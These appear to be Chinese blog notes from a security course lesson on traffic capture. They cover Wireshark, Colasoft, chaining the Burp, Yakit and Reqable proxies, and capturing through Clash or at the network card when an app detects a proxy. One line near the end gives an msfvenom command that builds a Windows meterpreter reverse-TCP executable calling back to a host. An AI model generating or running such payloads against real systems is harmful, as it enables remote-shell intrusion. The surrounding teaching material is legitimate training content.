2024小迪安全基础入门第七课

目录

一、抓包技术-Web&App&小程序&PC-扶墙双层

[二、 抓包技术-Web&App&小程序&PC-项目联动](#二、 抓包技术-Web&App&小程序&PC-项目联动)

三、抓包技术-Web&App&小程序&PC-全局协议


一、抓包技术-Web&App&小程序&PC-扶墙双层

Wireshark:

https://www.wireshark.org/

网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

科来网络分析系统:

https://www.colasoft.com.cn/

该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

二、 抓包技术-Web&App&小程序&PC-项目联动

#抓包工具联动

意义:让一个数据包同时经过不同安全测试工具进行扫描

Burp->Yakit

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

Yakit->Burp

1、Yakit 127.0.0.1:8083

2、设置下游 127.0.0.1:8080

3、Burp 127.0.0.1:8080

4、系统的代理设置:127.0.0.1:8083

Burp->Yakit->Reqable

1、Burp 127.0.0.1:8080

2、Yakit 127.0.0.1:8083

3、让Burp将给到Yakit

4、系统的代理设置:127.0.0.1:8080

5、Yakit设置下游 127.0.0.1:9000

三、抓包技术-Web&App&小程序&PC-全局协议

#科学上网抓包

Clash+Burp Clash+Yakit

解决:

1、目标需要采用梯子才能访问

2、IP隐藏去访问并要进行抓包

#全局协议抓包

WireShark 科来网络系统

1、解决部分代理校验

有部分的app web 小程序 当设置了代理后无法抓包

校验:检测到了当前机器的代理设置 做了一个策略防止

做了代理的设置数据走向:本身应用-代理-还没有到网卡-给到监听抓包工具

没有做代理的数据走向:本身应用-服务器(网卡抓包) 代理是在网卡之前产生

2、APP/小程序/PC应用

由于应用类型不同,不是说所有的应用都有https协议的数据

3、蓝队分析TCP/UDP应用

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=6666 -f exe -o 9.exe

相关推荐
tingshuo29175 小时前
D006 【模板】并查集
笔记
tingshuo29171 天前
S001 【模板】从前缀函数到KMP应用 字符串匹配 字符串周期
笔记
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954482 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star2 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954482 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全